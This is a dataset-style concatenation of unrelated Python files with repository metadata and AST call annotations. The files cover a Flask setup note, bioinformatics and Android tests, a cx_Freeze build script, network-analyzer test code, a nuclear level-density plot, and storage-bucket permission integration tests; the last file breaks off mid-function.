| [((13, 8, 13, 31), 'app.db.db.session.add', 'db.session.add', ({(13, 23, 13, 30): 'new_row'}, {}), '(new_row)', False, 'from app.db import db\n'), ((14, 8, 14, 27), 'app.db.db.session.commit', 'db.session.commit', ({}, {}), '()', False, 'from app.db import db\n'), ((23, 16, 23, 44), 'app.db.db.session.query', 'db.session.query', ({(23, 33, 23, 43): 'self.model'}, {}), '(self.model)', False, 'from app.db import db\n'), ((45, 12, 45, 31), 'app.db.db.session.commit', 'db.session.commit', ({}, {}), '()', False, 'from app.db import db\n'), ((54, 12, 54, 34), 'app.db.db.session.delete', 'db.session.delete', ({(54, 30, 54, 33): 'row'}, {}), '(row)', False, 'from app.db import db\n'), ((55, 12, 55, 31), 'app.db.db.session.commit', 'db.session.commit', ({}, {}), '()', False, 'from app.db import db\n')] |
QUDUSKUNLE/Python-Flask | set.py | 5990572b17923c976907c2fa5c2a9790f3a7c869 | """
How to set up virtual environment
pip install virtualenv
pip install virtualenvwrapper
# export WORKON_HOME=~/Envs
source /usr/local/bin/virtualenvwrapper.sh
# To activate virtualenv and set up flask
1. mkvirtualenv my-venv
###2. workon my-venv
3. pip install Flask
4. pip freeze
5. # To put all dependencies in a file
pip freeze > requirements.txt
6. run.py: entry point of the application
7. relational database management system
SQLite, MYSQL, PostgreSQL
SQLAlchemy is an Object Relational Mapper (ORM),
which means that it connects the objects of an application to tables in a
relational database management system.
""" | [] |
Badboy-16/SemiBin | test/test_generate_data_coassembly.py | 501bc1a7e310104c09475ca233a3f16d081f129a | from SemiBin.main import generate_data_single
import os
import pytest
import logging
import pandas as pd
def test_generate_data_coassembly():
logger = logging.getLogger('SemiBin')
logger.setLevel(logging.INFO)
sh = logging.StreamHandler()
sh.setFormatter(logging.Formatter('%(asctime)s - %(message)s'))
logger.addHandler(sh)
os.makedirs('output_coassembly',exist_ok=True)
generate_data_single(bams=['test/coassembly_sample_data/input.sorted1.bam',
'test/coassembly_sample_data/input.sorted2.bam',
'test/coassembly_sample_data/input.sorted3.bam',
'test/coassembly_sample_data/input.sorted4.bam',
'test/coassembly_sample_data/input.sorted5.bam'],
num_process=1,
logger=logger,
output='output_coassembly',
handle='test/coassembly_sample_data/input.fasta',
binned_short=False,
must_link_threshold=4000
)
data = pd.read_csv('output_coassembly/data.csv',index_col=0)
data_split = pd.read_csv('output_coassembly/data_split.csv',index_col=0)
assert data.shape == (40,141)
assert data_split.shape == (80,141) | [((8, 13, 8, 41), 'logging.getLogger', 'logging.getLogger', ({(8, 31, 8, 40): '"""SemiBin"""'}, {}), "('SemiBin')", False, 'import logging\n'), ((10, 9, 10, 32), 'logging.StreamHandler', 'logging.StreamHandler', ({}, {}), '()', False, 'import logging\n'), ((14, 4, 14, 50), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((15, 4, 26, 26), 'SemiBin.main.generate_data_single', 'generate_data_single', (), '', False, 'from SemiBin.main import generate_data_single\n'), ((28, 11, 28, 64), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((29, 17, 29, 76), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((11, 20, 11, 66), 'logging.Formatter', 'logging.Formatter', ({(11, 38, 11, 65): '"""%(asctime)s - %(message)s"""'}, {}), "('%(asctime)s - %(message)s')", False, 'import logging\n')] |
CarbonROM/android_tools_acloud | create/create_args_test.py | 0ed5352df639789767d8ea6fe0a510d7a84cfdcc | # Copyright 2020 - The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for create."""
import unittest
from unittest import mock
from acloud import errors
from acloud.create import create_args
from acloud.internal import constants
from acloud.internal.lib import driver_test_lib
def _CreateArgs():
"""set default pass in arguments."""
mock_args = mock.MagicMock(
flavor=None,
num=1,
adb_port=None,
hw_property=None,
stable_cheeps_host_image_name=None,
stable_cheeps_host_image_project=None,
username=None,
password=None,
cheeps_betty_image=None,
local_image=None,
local_kernel_image=None,
local_system_image=None,
system_branch=None,
system_build_id=None,
system_build_target=None,
local_instance=None,
remote_host=None,
host_user=constants.GCE_USER,
host_ssh_private_key_path=None,
avd_type=constants.TYPE_CF,
autoconnect=constants.INS_KEY_VNC)
return mock_args
# pylint: disable=invalid-name,protected-access
class CreateArgsTest(driver_test_lib.BaseDriverTest):
"""Test create_args functions."""
def testVerifyArgs(self):
"""test VerifyArgs."""
mock_args = _CreateArgs()
# Test args default setting shouldn't raise error.
self.assertEqual(None, create_args.VerifyArgs(mock_args))
def testVerifyArgs_ConnectWebRTC(self):
"""test VerifyArgs args.autconnect webrtc.
WebRTC only apply to remote cuttlefish instance
"""
mock_args = _CreateArgs()
mock_args.autoconnect = constants.INS_KEY_WEBRTC
# Test remote instance and avd_type cuttlefish(default)
# Test args.autoconnect webrtc shouldn't raise error.
self.assertEqual(None, create_args.VerifyArgs(mock_args))
# Test pass in none-cuttlefish avd_type should raise error.
mock_args.avd_type = constants.TYPE_GF
self.assertRaises(errors.UnsupportedCreateArgs,
create_args.VerifyArgs, mock_args)
if __name__ == "__main__":
unittest.main()
| [((28, 16, 49, 42), 'unittest.mock.MagicMock', 'mock.MagicMock', (), '', False, 'from unittest import mock\n'), ((82, 4, 82, 19), 'unittest.main', 'unittest.main', ({}, {}), '()', False, 'import unittest\n'), ((61, 31, 61, 64), 'acloud.create.create_args.VerifyArgs', 'create_args.VerifyArgs', ({(61, 54, 61, 63): 'mock_args'}, {}), '(mock_args)', False, 'from acloud.create import create_args\n'), ((73, 31, 73, 64), 'acloud.create.create_args.VerifyArgs', 'create_args.VerifyArgs', ({(73, 54, 73, 63): 'mock_args'}, {}), '(mock_args)', False, 'from acloud.create import create_args\n')] |
Kannuki-san/msman | setup.py | adc275ad0508d65753c8424e7f6b94becee0b855 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from cx_Freeze import setup,Executable
icondata='icon.ico'
base = None
# GUI=有効, CUI=無効 にする
if sys.platform == 'win32' : base = 'win32GUI'
exe = Executable(script = 'main.py',
base = base,
#icon=icondata
)
setup(name = 'MSman',
version = '0.1',
description = 'Minecraft Server Manager',
executables = [exe]
) | [((16, 6, 19, 19), 'cx_Freeze.Executable', 'Executable', (), '', False, 'from cx_Freeze import setup, Executable\n'), ((22, 0, 26, 7), 'cx_Freeze.setup', 'setup', (), '', False, 'from cx_Freeze import setup, Executable\n')] |
petee-d/stereotype | stereotype/roles.py | 33a2efc826fd907bd23ffb4e8f7cba119ff022ce | from __future__ import annotations
from threading import Lock
from typing import List, Set, Optional, Any, Tuple
from stereotype.utils import ConfigurationError
class Role:
__slots__ = ('code', 'name', 'empty_by_default')
def __init__(self, name: str, empty_by_default: bool = False):
self.name = name
self.empty_by_default = empty_by_default
with _roles_lock:
self.code = len(_roles)
_roles.append(self)
def __repr__(self):
return f'<Role {self.name}, empty_by_default={self.empty_by_default}, code={self.code}>'
def __hash__(self):
return self.code
def __eq__(self, other):
return type(self) == type(other) and self.code == other.code
def whitelist(self, *fields, override_parents: bool = False):
return RequestedRoleFields(self, fields, is_whitelist=True, override_parents=override_parents)
def blacklist(self, *fields, override_parents: bool = False):
return RequestedRoleFields(self, fields, is_whitelist=False, override_parents=override_parents)
_roles: List[Role] = []
_roles_lock = Lock()
DEFAULT_ROLE = Role('default')
class FinalizedRoleFields:
__slots__ = ('role', 'fields')
def __init__(self, role: Role, fields: Optional[Set[str]] = None):
self.role = role
self.fields = fields or set()
def update_requested(self, other: RequestedRoleFields, all_field_names: Set[str], field_names: Set[str]):
assert self.role == other.role
if other.override_parents:
initial = set() if other.is_whitelist else all_field_names
else:
initial = self.fields
if other.is_whitelist:
self.fields = initial | other.fields
else:
self.fields = (initial | field_names) - other.fields
class RequestedRoleFields:
__slots__ = ('role', 'fields', 'is_whitelist', 'override_parents')
def __init__(self, role: Role, fields, is_whitelist: bool, override_parents: bool):
self.fields, non_descriptors = self._collect_input_fields(fields)
if non_descriptors:
raise ConfigurationError(f'Role blacklist/whitelist needs member descriptors (e.g. cls.my_field), '
f'got {non_descriptors[0]!r}')
self.role = role
self.is_whitelist = is_whitelist
self.override_parents = override_parents
def _collect_input_fields(self, fields) -> Tuple[Set[str], List[Any]]:
field_names: Set[str] = set()
non_descriptors: List[Any] = []
for field in fields:
if type(field).__name__ == 'member_descriptor':
field_names.add(field.__name__)
elif isinstance(field, property):
field_names.add(field.fget.__name__)
else:
non_descriptors.append(field)
return field_names, non_descriptors
| [((36, 14, 36, 20), 'threading.Lock', 'Lock', ({}, {}), '()', False, 'from threading import Lock\n'), ((66, 18, 67, 67), 'stereotype.utils.ConfigurationError', 'ConfigurationError', ({(66, 37, 67, 66): 'f"""Role blacklist/whitelist needs member descriptors (e.g. cls.my_field), got {non_descriptors[0]!r}"""'}, {}), "(\n f'Role blacklist/whitelist needs member descriptors (e.g. cls.my_field), got {non_descriptors[0]!r}'\n )", False, 'from stereotype.utils import ConfigurationError\n')] |
coderdq/vuetest | WEB21-1-12/WEB2/power/zvl_test.py | 28ea4f36e2c4e7e80d1ba1777ef312733ef84048 | # coding:utf-8
'''
矢网的测试项,包括增益,带内波动,VSWR
一个曲线最多建10个marker
'''
import os
import logging
from commoninterface.zvlbase import ZVLBase
logger = logging.getLogger('ghost')
class HandleZVL(object):
def __init__(self, ip, offset):
self.zvl = None
self.ip = ip
self.offset = float(offset)
def init_zvl(self, path):
logger.debug('init zvl')
self.zvl = ZVLBase()
self.zvl.init_inst(self.ip)
self.zvl.reset_zvl()
self.path = path # 存储图片的路径
def close_zvl(self):
self.zvl.close_inst()
def set_edge(self, low_edge, up_edge):
'''
:param low_edge: float单位MHz
:param up_edge: float单位MHz
:return:
'''
try:
low = '{}MHz'.format(low_edge)
up = '{}MHz'.format(up_edge)
self.zvl.set_freq(low, up)
return True
except Exception as e:
logger.error('set_edge error {}'.format(e))
return False
def set_trace(self, tracen, form, means):
'''
:param tracen: int
form:str,
means:str,'S11','S12','S21','S22'
:return:
'''
try:
self.zvl.set_trace_form(tracen, form)
self.zvl.change_trace_meas(tracen, means)
if form == 'MLOG':
self.zvl.set_div_value(tracen, 10)
# zvl.set_ref_value(zvlhandler, tracen, -40)
return True
except Exception as e:
logger.error('set_trace error {}'.format(e))
return False
def read_markery(self, tracen, markern, x):
x_str = '{}MHz'.format(x)
self.zvl.set_trace_marker(tracen, markern, x_str) # 设置marker点
_, marker1y = self.zvl.query_marker(tracen, markern)
return marker1y
def read_max_marker(self, tracen, markern):
try:
self.zvl.create_max_marker(tracen, markern) # max marker
# create_max_marker(zvlhandler, tracen, markern + 1) # max marker
marker1x, marker1y = self.zvl.query_marker(tracen, markern)
return float(marker1x) / 1000000.0, marker1y
except Exception as e:
logger.error('get_max_loss error {}'.format(e))
return None
def get_ripple_in_bw(self, tracen, markern):
'''
带内波动
:return:
'''
try:
self.zvl.create_min_marker(tracen, markern) # min marker
self.zvl.create_max_marker(tracen, markern + 1) # max marker
_, marker1y = self.zvl.query_marker(tracen, markern)
_, marker2y = self.zvl.query_marker(tracen, markern + 1)
absy = abs(float(marker1y) - float(marker2y))
return absy
except Exception as e:
logger.error('get_ripple_in_bw error{}'.format(e))
return None
def get_gain(self, *args):
'''
读取增益及带内波动
S21 dBmg
:return:高,中,低点增益,带内波动
'''
logger.debug('zvl get gain')
high, mid, low = args # 高中低
self.zvl.remove_allmarker(1)
self.set_edge(low, high)
tracen = 1
self.set_trace(tracen, 'MLOG', 'S21')
markern = 1
# 读高,中,低点的增益
high_markery = float(self.read_markery(tracen, markern, high))
markern += 1
mid_markery = float(self.read_markery(tracen, markern, mid))
markern += 1
low_markery = float(self.read_markery(tracen, markern, low))
# 带内波动
markern += 1
ripple = self.get_ripple_in_bw(tracen, markern) # 绝对值
ret = [high_markery + self.offset, mid_markery + self.offset,
low_markery + self.offset, ripple]
ret2 = ['%.2f' % float(item) for item in ret]
return ret2
def get_vswr(self, *args):
'''
VSWR S11,SWR
:return:max markerx,max markery
'''
logger.debug('zvl get_vswr')
self.zvl.remove_allmarker(1)
high, mid, low, dl_ul,temp = args # 高中低
tracen = 1
markern = 1
start = float(low) - 2.5
end = float(high) + 2.5
self.set_edge(start, end)
self.set_trace(tracen, 'SWR', 'S11')
marker = self.read_max_marker(tracen, markern)
# 截图
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_{}_VSWR.PNG'.format(temp, dl_ul,end))
self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
# mstr='@'.join([str(item) for item in marker])
marker2 = ['%.2f' % float(item) for item in marker]
return marker2
def get_gain_vs_freq(self, markerlist,dl_ul, temp):
'''
825~835MHz,870~880,890~915,935~960,1570.42~1585,
1710~1785,1805~1880,1920~1980,2110~2170,
2570~2620,1880~1915,2300~2400,2400~2483.5
截图三张,一张图最多截10个marker
markerlist:[]
:return:
'''
logger.debug('zvl get_gain_vs_freq')
self.zvl.remove_allmarker(1)
tracen = 1
markern = 1
self.set_trace(tracen, 'MLOG', 'S21')
markery_list = [] # 所有点的增益,注意要加上offset
try:
# 第一张图
self.set_edge(700, 1700)
marker_lst = markerlist[:10]
for marker in marker_lst:
mstr = '{}MHz'.format(marker)
self.zvl.set_trace_marker(tracen, markern, mstr)
_, marker1y = self.zvl.query_marker(tracen, markern) # str
markery_list.append(marker1y)
markern += 1
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_gain_vs_freq_1.PNG'.format(temp,dl_ul))
self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
self.zvl.remove_allmarker(1)
# 第二张图
marker_lst = markerlist[10:20]
markern = 1
self.set_edge(1700, 3000)
for marker in marker_lst:
mstr = '{}MHz'.format(marker)
self.zvl.set_trace_marker(tracen, markern, mstr)
_, marker1y = self.zvl.query_marker(tracen, markern)
markery_list.append(marker1y)
markern += 1
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_gain_vs_freq_2.PNG'.format(temp,dl_ul))
self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
self.zvl.remove_allmarker(1)
# 第三张图
marker_lst = markerlist[20:]
markern = 1
for marker in marker_lst:
mstr = '{}MHz'.format(marker)
self.zvl.set_trace_marker(tracen, markern, mstr)
_, marker1y = self.zvl.query_marker(tracen, markern)
markery_list.append(marker1y)
markern += 1
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_gain_vs_freq_3.PNG'.format(temp,dl_ul))
self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
except Exception as e:
logger.error(e)
finally:
# logger.debug(markery_list)
ret = ['%.2f' % (float(item) + self.offset) for item in markery_list]
return ret
| [((10, 9, 10, 35), 'logging.getLogger', 'logging.getLogger', ({(10, 27, 10, 34): '"""ghost"""'}, {}), "('ghost')", False, 'import logging\n'), ((21, 19, 21, 28), 'commoninterface.zvlbase.ZVLBase', 'ZVLBase', ({}, {}), '()', False, 'from commoninterface.zvlbase import ZVLBase\n'), ((141, 31, 141, 57), 'os.path.dirname', 'os.path.dirname', ({(141, 47, 141, 56): 'self.path'}, {}), '(self.path)', False, 'import os\n'), ((173, 35, 173, 61), 'os.path.dirname', 'os.path.dirname', ({(173, 51, 173, 60): 'self.path'}, {}), '(self.path)', False, 'import os\n'), ((186, 35, 186, 61), 'os.path.dirname', 'os.path.dirname', ({(186, 51, 186, 60): 'self.path'}, {}), '(self.path)', False, 'import os\n'), ((198, 35, 198, 61), 'os.path.dirname', 'os.path.dirname', ({(198, 51, 198, 60): 'self.path'}, {}), '(self.path)', False, 'import os\n')] |
ErlendLima/70Zn | kshell/partial_level_density.py | 1bf73adec5a3960e195788bc1f4bc79b2086be64 | from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import shellmodelutilities as smutil
# Set bin width and range
bin_width = 0.20
Emax = 14
Nbins = int(np.ceil(Emax/bin_width))
Emax_adjusted = bin_width*Nbins # Trick to get an integer number of bins
bins = np.linspace(0,Emax_adjusted,Nbins+1)
# Define list of calculation input files and corresponding label names
inputfile = "summary_Zn70_jun45.txt"
# Instantiate figure which we will fill
f_rho, ax_rho = plt.subplots(1,1)
# Read energy levels from file
levels = smutil.read_energy_levels(inputfile)
# Choose which [2*J,pi] combinations to include in partial level density plot
Jpi_list = [[0,-1],[2,-1],[4,-1],[6,-1],[8,-1],[10,-1],[12,-1],[14,-1],[16,-1],[18,-1],[20,-1],[22,-1],[24,-1],[26,-1],[28,-1],
[0,+1],[2,+1],[4,+1],[6,+1],[8,+1],[10,+1],[12,+1],[14,+1],[16,+1],[18,+1],[20,+1],[22,+1],[24,+1],[26,+1],[28,+1]]
# Allocate (Ex,Jpi) matrix to store partial level density
rho_ExJpi = np.zeros((Nbins,len(Jpi_list)))
# Count number of levels for each (Ex, J, pi) pixel.
Egs = levels[0,0] # Ground state energy
for i_l in range(len(levels[:,0])):
E, J, pi = levels[i_l]
# Skip if level is outside range:
if E-Egs >= Emax:
continue
i_Ex = int(np.floor((E-Egs)/bin_width))
try:
i_Jpi = Jpi_list.index([J,pi])
except:
continue
rho_ExJpi[i_Ex,i_Jpi] += 1
rho_ExJpi /= bin_width # Normalize to bin width, to get density in MeV^-1
# Plot it
from matplotlib.colors import LogNorm # To get log scaling on the z axis
colorbar_object = ax_rho.pcolormesh(np.linspace(0,len(Jpi_list)-1,len(Jpi_list)), bins, rho_ExJpi, norm=LogNorm())
f_rho.colorbar(colorbar_object) # Add colorbar to plot
# Make the plot nice
ax_rho.set_xlabel(r"$\pi\cdot J\,\mathrm{(\hbar)}$")
ax_rho.set_ylabel(r'$E_x \, \mathrm{(MeV)}$')
# A bit of Python voodoo to get the x labels right:
Jpi_array = np.append(np.linspace(0,-int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2)),np.linspace(0,int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2))) # Array of pi*J for plot
def format_func(value, tick_number):
if value >= 0 and value <= 28:
return int(Jpi_array[int(value)])
else:
return None
ax_rho.set_xlim([0,29])
ax_rho.xaxis.set_major_formatter(plt.FuncFormatter(format_func))
ax_rho.set_xticks([0,2,4,6,8,10,12,14,15,17,19,21,23,25,27])
# Show plot
plt.show()
| [((13, 7, 13, 43), 'numpy.linspace', 'np.linspace', ({(13, 19, 13, 20): '0', (13, 21, 13, 34): 'Emax_adjusted', (13, 35, 13, 42): 'Nbins + 1'}, {}), '(0, Emax_adjusted, Nbins + 1)', True, 'import numpy as np\n'), ((19, 16, 19, 33), 'matplotlib.pyplot.subplots', 'plt.subplots', ({(19, 29, 19, 30): '1', (19, 31, 19, 32): '1'}, {}), '(1, 1)', True, 'import matplotlib.pyplot as plt\n'), ((22, 9, 22, 45), 'shellmodelutilities.read_energy_levels', 'smutil.read_energy_levels', ({(22, 35, 22, 44): 'inputfile'}, {}), '(inputfile)', True, 'import shellmodelutilities as smutil\n'), ((68, 0, 68, 10), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((11, 12, 11, 35), 'numpy.ceil', 'np.ceil', ({(11, 20, 11, 34): 'Emax / bin_width'}, {}), '(Emax / bin_width)', True, 'import numpy as np\n'), ((64, 33, 64, 63), 'matplotlib.pyplot.FuncFormatter', 'plt.FuncFormatter', ({(64, 51, 64, 62): 'format_func'}, {}), '(format_func)', True, 'import matplotlib.pyplot as plt\n'), ((37, 15, 37, 42), 'numpy.floor', 'np.floor', ({(37, 24, 37, 41): '(E - Egs) / bin_width'}, {}), '((E - Egs) / bin_width)', True, 'import numpy as np\n'), ((49, 104, 49, 113), 'matplotlib.colors.LogNorm', 'LogNorm', ({}, {}), '()', False, 'from matplotlib.colors import LogNorm\n')] |
neuro-inc/platform-buckets-api | tests/integration/test_provider_base.py | ba04edeb8565fa06e5af6d0316957a8816b087b2 | import abc
import secrets
from collections.abc import AsyncIterator, Awaitable, Callable, Mapping
from contextlib import AbstractAsyncContextManager, asynccontextmanager
from dataclasses import dataclass
from datetime import datetime, timezone
import pytest
from aiohttp import ClientSession
from yarl import URL
from platform_buckets_api.providers import (
BucketExistsError,
BucketNotExistsError,
BucketPermission,
BucketProvider,
RoleExistsError,
UserBucketOperations,
)
from platform_buckets_api.storage import ImportedBucket, ProviderBucket
BUCKET_NAME_PREFIX = "integration-tests-"
ROLE_NAME_PREFIX = "integration-tests-"
def _make_bucket_name() -> str:
return BUCKET_NAME_PREFIX + secrets.token_hex(5)
def _make_role_name() -> str:
return ROLE_NAME_PREFIX + secrets.token_hex(5)
class BasicBucketClient(abc.ABC):
@abc.abstractmethod
async def put_object(self, key: str, data: bytes) -> None:
pass
@abc.abstractmethod
async def read_object(self, key: str) -> bytes:
pass
@abc.abstractmethod
async def list_objects(self) -> list[str]:
pass
@abc.abstractmethod
async def delete_object(self, key: str) -> None:
pass
@dataclass()
class ProviderTestOption:
type: str
provider: BucketProvider
bucket_exists: Callable[[str], Awaitable[bool]]
make_client: Callable[
[ProviderBucket, Mapping[str, str]],
AbstractAsyncContextManager[BasicBucketClient],
]
get_admin: Callable[
[ProviderBucket], AbstractAsyncContextManager[BasicBucketClient]
]
role_exists: Callable[[str], Awaitable[bool]]
get_public_url: Callable[[str, str], URL]
credentials_for_imported: Mapping[str, str]
def as_admin_cm(
creator_func: Callable[[ProviderBucket], BasicBucketClient]
) -> Callable[[ProviderBucket], AbstractAsyncContextManager[BasicBucketClient]]:
@asynccontextmanager
async def creator(bucket: ProviderBucket) -> AsyncIterator[BasicBucketClient]:
yield creator_func(bucket)
return creator
# Access checkers
async def _test_no_access(
admin_client: BasicBucketClient,
user_client: BasicBucketClient,
) -> None:
data = b"\x01" * 1024
key = secrets.token_hex(8)
with pytest.raises(Exception):
await user_client.put_object(key, data)
await admin_client.put_object(key, data)
with pytest.raises(Exception):
await user_client.read_object(key)
with pytest.raises(Exception):
await user_client.list_objects()
with pytest.raises(Exception):
await user_client.delete_object(key)
async def _test_read_access(
admin_client: BasicBucketClient,
user_client: BasicBucketClient,
) -> None:
data = b"\x01" * 1024
key = "foo"
with pytest.raises(Exception):
await user_client.put_object(key, data)
await admin_client.put_object(key, data)
assert await user_client.read_object(key) == data
assert key in await user_client.list_objects()
with pytest.raises(Exception):
await user_client.delete_object(key)
async def _test_write_access(
user_client: BasicBucketClient,
) -> None:
data = b"\x01" * 1024
key = "foo"
await user_client.put_object(key, data)
assert await user_client.read_object(key) == data
assert key in await user_client.list_objects()
await user_client.delete_object(key)
assert key not in await user_client.list_objects()
class TestProviderBase:
__test__ = False
async def test_bucket_create(self, provider_option: ProviderTestOption) -> None:
name = _make_bucket_name()
bucket = await provider_option.provider.create_bucket(name)
assert bucket.name == name
assert await provider_option.bucket_exists(name)
async def test_bucket_duplicate_create(
self,
provider_option: ProviderTestOption,
) -> None:
name = _make_bucket_name()
await provider_option.provider.create_bucket(name)
with pytest.raises(BucketExistsError):
await provider_option.provider.create_bucket(name)
async def test_bucket_delete(self, provider_option: ProviderTestOption) -> None:
name = _make_bucket_name()
bucket = await provider_option.provider.create_bucket(name)
await provider_option.provider.delete_bucket(bucket.name)
assert not await provider_option.bucket_exists(name)
async def test_bucket_delete_unknown(
self, provider_option: ProviderTestOption
) -> None:
with pytest.raises(BucketNotExistsError):
await provider_option.provider.delete_bucket(_make_bucket_name())
async def test_bucket_credentials_write_access(
self, provider_option: ProviderTestOption
) -> None:
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
credentials = await provider_option.provider.get_bucket_credentials(
bucket, write=True, requester="testing"
)
async with provider_option.make_client(bucket, credentials) as user_client:
await _test_write_access(user_client)
async def test_bucket_credentials_read_access(
self, provider_option: ProviderTestOption
) -> None:
return
if provider_option.type == "aws":
pytest.skip("Moto do not support embedding policies into token")
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
credentials = await provider_option.provider.get_bucket_credentials(
bucket, write=False, requester="testing"
)
async with provider_option.make_client(
bucket, credentials
) as user_client, provider_option.get_admin(bucket) as admin:
await _test_read_access(admin, user_client)
async def test_signed_url_for_blob(
self, provider_option: ProviderTestOption
) -> None:
if provider_option.type == "aws":
pytest.skip("Moto fails for signed url with 500")
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
async with provider_option.get_admin(bucket) as admin_client:
await admin_client.put_object("foo/bar", b"test data")
url = await provider_option.provider.sign_url_for_blob(bucket, "foo/bar")
async with ClientSession() as session:
async with session.get(url) as resp:
data = await resp.read()
assert data == b"test data"
async def test_public_access_to_bucket(
self, provider_option: ProviderTestOption
) -> None:
if provider_option.type == "aws":
pytest.skip("Moto has bad support of this operation")
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
async with provider_option.get_admin(bucket) as admin_client:
await admin_client.put_object("blob1", b"blob data 1")
await admin_client.put_object("blob2", b"blob data 2")
await provider_option.provider.set_public_access(bucket.name, True)
async with ClientSession() as session:
url = provider_option.get_public_url(bucket.name, "blob1")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 1"
url = provider_option.get_public_url(bucket.name, "blob2")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 2"
async def test_bucket_make_public_for_imported_bucket(
self, provider_option: ProviderTestOption
) -> None:
if provider_option.type == "aws":
pytest.skip("Moto fails with 500")
name = _make_bucket_name()
bucket = await provider_option.provider.create_bucket(name)
async with provider_option.get_admin(bucket) as admin_client:
await admin_client.put_object("blob1", b"blob data 1")
await admin_client.put_object("blob2", b"blob data 2")
async with UserBucketOperations.get_for_imported_bucket(
ImportedBucket(
id="not-important",
created_at=datetime.now(timezone.utc),
owner="user",
name="not-important",
org_name=None,
public=False,
provider_bucket=bucket,
credentials=provider_option.credentials_for_imported,
)
) as operations:
await operations.set_public_access(bucket.name, True)
async with ClientSession() as session:
url = provider_option.get_public_url(bucket.name, "blob1")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 1"
url = provider_option.get_public_url(bucket.name, "blob2")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 2"
@pytest.fixture()
async def sample_role_permissions(
self, provider_option: ProviderTestOption
) -> list[BucketPermission]:
bucket_name = _make_bucket_name()
await provider_option.provider.create_bucket(bucket_name)
return [
BucketPermission(
bucket_name=bucket_name,
write=True,
)
]
async def test_role_create(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name = _make_role_name()
role = await provider_option.provider.create_role(name, sample_role_permissions)
assert name in role.name
assert await provider_option.role_exists(role.name)
async def test_role_create_multiple(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name1, name2 = _make_role_name(), _make_role_name()
role1 = await provider_option.provider.create_role(
name1, sample_role_permissions
)
role2 = await provider_option.provider.create_role(
name2, sample_role_permissions
)
assert await provider_option.role_exists(role1.name)
assert await provider_option.role_exists(role2.name)
async def test_role_duplicate(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name = _make_role_name()
await provider_option.provider.create_role(name, sample_role_permissions)
with pytest.raises(RoleExistsError):
await provider_option.provider.create_role(name, sample_role_permissions)
async def test_role_delete(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name = _make_role_name()
role = await provider_option.provider.create_role(name, sample_role_permissions)
await provider_option.provider.delete_role(role)
assert not await provider_option.role_exists(role.name)
async def test_role_grant_bucket_write_access(
self,
provider_option: ProviderTestOption,
) -> None:
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket.name,
write=True,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(bucket, role.credentials) as user_client:
await _test_write_access(user_client)
async def test_role_grant_bucket_read_only_access(
self,
provider_option: ProviderTestOption,
) -> None:
return
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket.name,
write=False,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(
bucket, role.credentials
) as user_client, provider_option.get_admin(bucket) as admin:
await _test_read_access(admin, user_client)
async def test_role_grant_access_multiple_buckets(
self,
provider_option: ProviderTestOption,
) -> None:
if provider_option.type == "azure":
pytest.skip("Azure provider do not support multiple buckets roles")
bucket1 = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket1.name,
write=True,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(
bucket1, role.credentials
) as user_client:
await _test_write_access(user_client)
bucket2 = await provider_option.provider.create_bucket(_make_bucket_name())
await provider_option.provider.set_role_permissions(
role,
[
BucketPermission(
bucket_name=bucket1.name,
write=True,
),
BucketPermission(
bucket_name=bucket2.name,
write=True,
),
],
)
async with provider_option.make_client(
bucket1, role.credentials
) as user_client:
await _test_write_access(user_client)
async with provider_option.make_client(
bucket2, role.credentials
) as user_client:
await _test_write_access(user_client)
async def test_role_downgrade_access(
self,
provider_option: ProviderTestOption,
) -> None:
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket.name,
write=True,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(bucket, role.credentials) as user_client:
await _test_write_access(user_client)
await provider_option.provider.set_role_permissions(
role,
[
BucketPermission(
bucket_name=bucket.name,
write=False,
),
],
)
async with provider_option.make_client(
bucket, role.credentials
